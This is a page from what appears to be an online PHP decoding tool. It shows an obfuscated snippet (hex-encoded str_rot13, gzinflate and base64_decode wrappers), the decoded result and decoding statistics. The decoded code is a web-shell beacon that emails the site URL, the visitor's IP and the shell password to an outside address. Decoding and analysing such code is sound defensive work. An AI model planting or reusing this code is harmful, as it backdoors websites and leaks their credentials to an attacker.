Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

$st = "\x73\x74\x72\x5f\x72\x6f\x74\x31\x33"; $gz = "\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65..

Decoded Output download

b'$visitcount = $HTTP_COOKIE_VARS["visits"]; if( $visitcount == "") {$visitcount = 0; $visitor = $_SERVER["REMOTE_ADDR"]; $web = $_SERVER["HTTP_HOST"]; $inj = $_SERVER["REQUEST_URI"]; $target = rawurldecode($web.$inj); $body = "Your Shell Opened at $target by $visitor with password $auth_pass"; @mail("[email protected]","Result http://$target by $visitor", "$body"); } else { $visitcount; } setcookie("visits",$visitcount);'

Did this file decode correctly?

Original Code

$st = "\x73\x74\x72\x5f\x72\x6f\x74\x31\x33";
$gz = "\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65";
$st2 = "\x73\x74\x72\x5f\x72\x6f\x74\x31\x33";
$bs = "\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";
$ext = "epBbWMNAEIX/yjDkIYHQqo+GT4lh0oIUG3WRFgnZsLsxlFzGcWhb/O9zg5dJfNs958w3h2RetNSq4VKmYAbOJo7v0scwfNom6WXFoj2OvsTnAPSrC85sfAaIHpwuNLgKvk9cS2AaJXmZsD2ycRfGVrpNr5mFOSXVF/64bBNT8ejq7O3P9P0iieJnwbajryrRkV0nqrIQpqWGt+RN6MTObVCk5u1uCOADLwRRPRkDbkEZtUOpH0B9+Hpbd9VQXlZMZdGCRhWqQu0XA5gfK3pcNLzrVVXLurmeakmcNPyIPjKShUTQK5XfQaf/0NEHHCvh0O0DyFWC0/k5rSp2a/NqWu732f2zhBd8Ag==";
echo($st($gz($st2($bs(($ext))))));

Function Calls

gzinflate 1
str_rot13 2
base64_decode 1

Variables

$bs base64_decode
$gz gzinflate
$st str_rot13
$ext epBbWMNAEIX/yjDkIYHQqo+GT4lh0oIUG3WRFgnZsLsxlFzGcWhb/O9zg5dJ..
$st2 str_rot13

Stats

MD5 596af9c0273acf5ecae65237249560bc
Eval Count 0
Decode Time 61 ms